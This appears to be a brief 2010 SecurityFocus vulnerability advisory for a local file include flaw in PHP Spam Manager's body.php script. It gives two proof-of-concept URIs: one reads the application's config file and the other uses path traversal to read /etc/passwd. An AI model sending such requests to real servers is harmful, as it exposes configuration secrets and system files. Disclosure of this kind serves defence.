PHP Spam Manager 'body.php' Local File Include Vulnerability

Attackers can exploit this issue via a browser.

The following proof-of-concept URI is available:

http://www.example.com/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php
http://www.example.com/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus